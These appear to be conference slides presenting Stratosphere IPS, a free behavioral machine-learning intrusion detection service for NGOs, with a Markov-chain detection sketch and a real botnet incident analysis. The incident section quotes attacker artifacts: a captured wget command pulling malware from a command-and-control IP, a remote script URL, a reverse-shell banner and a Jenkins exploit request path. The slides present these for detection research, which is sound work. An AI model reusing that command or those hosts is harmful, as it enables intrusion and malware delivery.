Stratosphere IPS

The free machine learning malware detection for the community

Sebastian Garcia - CTU University, Prague

@eldracote

sebastian.garcia@agents.fel.cvut.cz

https://stratosphereips.org

Live Slides: bit.ly/ekoparty2016

NGOs are at risk

Problems in NGOs Security

  • Highly political targets.

  • Attacked by powerful actors

  • No resources.

  • Not their goal.

  • Strong concerns about their privacy.

  • Concerns about Trust.

Stratosphere IPS

Free Software. Machine Learning. Behavioral IPS. Protecting NGOs.

Stratosphere Goals

  • To put machine learning techniques in the hands of the civil society.

  • To offer this detection service to NGOs for free.

  • To focus on what computers are doing, not the attacks they receive.

Stratosphere Tech Principles

  • Less is More

    • Analyze the behavior of groups of flows.

  • Disassociate

    • Representation of behavior from detection.

  • Verify

    • With real and labeled datasets.

About Behaviors

  • Your behavior is usually the same when connecting with the same service.

  • Group flows going to a specific service by ignoring the source port. We call it a connection.

  • The connection, composed of several flows, now shows a behavior in time.

Network Behaviors

  • Model network behaviors as a string of letters.

  • 1 flow → 3 features → 1 letter

Malware Behaviors

  • Malware mostly generates the same behaviors.

  • Changing the behavior is costly for the attacker.

  • These behaviors do not expire quickly.


Behavior of Connections

Markov Chains Models

  • Create, train and store Markov Chain models.

Behavioral Detection

Trained

Markov Models

Similarity to Unknown Traffic
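As an added example (not Stratosphere's own code), a Python sketch of the pipeline the previous slides describe: group flows into connections by ignoring the source port, map each flow's three features to one letter, train a Markov chain on a known behavior string and score unknown connections by their likelihood under that chain. The flows, the letter alphabet, the thresholds and the training string are constructed stand-ins, not the real Stratosphere tables.

```python
from collections import Counter, defaultdict
from math import log
FLOWS = [  # constructed flows (not real traffic): src, dst, dport, proto, sport, bytes, duration, start
    ("10.0.0.5", "203.0.113.7", 25000, "tcp", 41001, 12000, 3.0, 0.0),
    ("10.0.0.5", "203.0.113.7", 25000, "tcp", 41002, 11500, 2.8, 10.0),
    ("10.0.0.5", "203.0.113.7", 25000, "tcp", 41003, 12200, 3.1, 20.0),
    ("10.0.0.5", "203.0.113.7", 25000, "tcp", 41004, 11800, 2.9, 30.0),
    ("10.0.0.5", "198.51.100.3", 443, "tcp", 41005, 500, 0.2, 1.0),
    ("10.0.0.5", "198.51.100.3", 443, "tcp", 41006, 700, 0.3, 1.5),
]
ALPHABET = "abcdefghi" + "ABCDEFGHI"   # assumed toy alphabet: 9 letters, 2 cases
KNOWN_MALICIOUS = "hHHHHhHHHHhHHHH"    # constructed training string for one known behavior
def connection_key(flow):
    """The slides' 'connection': same src, dst, dst port and proto; source port ignored."""
    return "-".join(map(str, flow[:4]))

def flow_letter(nbytes, duration, period_ratio):
    """Three features -> one letter (simplified stand-in for the Stratosphere alphabet)."""
    size = 0 if nbytes < 1000 else 1 if nbytes < 10000 else 2
    dur = 0 if duration < 1 else 1 if duration < 5 else 2
    periodic = period_ratio is not None and 0.8 <= period_ratio <= 1.25
    letter = "abcdefghi"[size * 3 + dur]
    return letter.upper() if periodic else letter   # upper case marks a periodic flow

def behavior_strings(flows):
    """Group flows into connections and turn each one into a string of letters over time."""
    conns = defaultdict(list)
    for f in sorted(flows, key=lambda f: f[7]):
        conns[connection_key(f)].append(f)
    result = {}
    for key, fl in conns.items():
        letters, prev_gap = [], None
        for i, f in enumerate(fl):
            gap = f[7] - fl[i - 1][7] if i else None
            ratio = gap / prev_gap if gap and prev_gap else None   # ~1.0 means periodic
            letters.append(flow_letter(f[5], f[6], ratio))
            prev_gap = gap
        result[key] = "".join(letters)
    return result
class MarkovModel:
    """First-order Markov chain over letters, trained on one known behavior string."""
    def __init__(self, string):
        self.pairs = Counter(zip(string, string[1:]))
        self.totals = Counter(string[:-1])
    def transition(self, a, b):
        # Laplace smoothing so transitions never seen in training stay nonzero
        return (self.pairs[(a, b)] + 1) / (self.totals[a] + len(ALPHABET))
    def similarity(self, string):
        """Mean log-likelihood per transition: higher means the traffic fits this model."""
        return sum(log(self.transition(a, b)) for a, b in zip(string, string[1:])) / max(len(string) - 1, 1)
```

The periodic, large, medium-duration connection comes out as a string of repeated letters that the trained chain scores far higher than the short, irregular web connection.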

Real Detection Example

Example Detection

  • January 18th, 2016.

  • Got an alert from a malicious behavior.

147.32.xx.xx-23.247.5.27-25000-tcp [Global Frag Networks,US]: 88,H,H,h,H,H,h,h,h,h,h,H,h,H,H,H,H,H,H,H,H,H,H,H,H,H,h,h,h,h,H,

"For a long time there was a periodic connection (freq 5s-60s), to an uncommon port, with large flows of medium duration."

The Detected Connection

Sent: "+.............P.43.249.81.135.......?."
Recv once:  "import time as O000OO0O0O00OO00O"

  • 43.249.81.135

    • No VirusTotal detection.

    • AS58879 Shanghai Anchang Network Security Technology Co.,L. China.

    • Last known domain: lyzqmir2.com. Minecraft server.

The Beginning

  • 103.242.134.118 port 33333/TCP [VT:7]

    • S:"/bin/sh: 0: can't access tty; job control turned off.$,"

    • S:"tomcat6 17547 0.0 0.0 7944 868 ? S 13:36 0:00 grep abcc.$

    • S:"wget 23.247.5.27:435/abcc.c"

  • 23.247.5.27 port 25000/TCP (main CC)

    • "=...-== Love AV ==-:..Linux 3.2.0-4-amd64"

  • Python Script (Deobfuscated by Veronica Valeros, thanks!)

    • "http://222.179.116.23:8080/theme/1/pys.py"

Is it Attacking?

  • Hundreds of connections to IPs in China, port 80/UDP.

  • 115.239.248.88 port 80/UDP [MoveInternet Network Technology Co.,Ltd.,CN]

    • Few Kb of binary data sent.

    • No apparent explanation.

The Attack Conclusion

  • Strange POSTs to Jenkins minutes before

    • POST /jenkins/descriptor/hudson.model.DownloadService/...

  • Remote Jenkins code execution vulnerability CVE-2015-8103. Metasploit module.

  • C&C channel with 10s timeouts.

  • Receives orders and executes OS commands

  • Function to send random UDP data to IPs.

  • Similar to BillGates botnet, not quite.

What to do with this?

Stratosphere Data Analysis Service

Stratosphere Data Analysis

  • Cloud-based detection service for NGOs.

  • Add new algorithms continually.

  • Update the models.

  • Verify the detections if necessary.


  • We sign NDAs; NGOs can send the flows or only the letters. Privacy matters.

New Algorithms

  • Anomaly Detection

    • New feature in behavioral letters.

  • Malicious HTTPS detection.

  • Graph Analysis of sequential connections.

  • WHOIS similarity grouping.

  • P2P behavior

  • Behavioral Patterns of the Host.

Example of Graph Analysis

Organizations working with us

  • People In Need. CZ. Helping 22 countries. Human-rights, war, etc.

  • CZ.NIC. Manager of .cz and Turris Project. 2,000 Internet Networks.

  • ICT help for policy makers in 20 African Countries

  • CTU University. With more than 7,000 hosts.

Want to help NGOs?

  • Are you researching in network security?

  • Like network security analysis?

  • Know NGOs that are at risk in Latin America? Suggest them to us.

  • Know activists or journalists under attack? Tell us.

  • We are already working with researchers in Argentina. Help the project.

Conclusion

  • NGOs need our help.

  • Trust and openness are essential.

  • Continuous visibility and analysis are paramount.

  • Behavioral Machine Learning is improving.

Questions? And Thanks!

Sebastian Garcia 

eldraco@gmail.com

sebastian.garcia@agents.fel.cvut.cz

@eldracote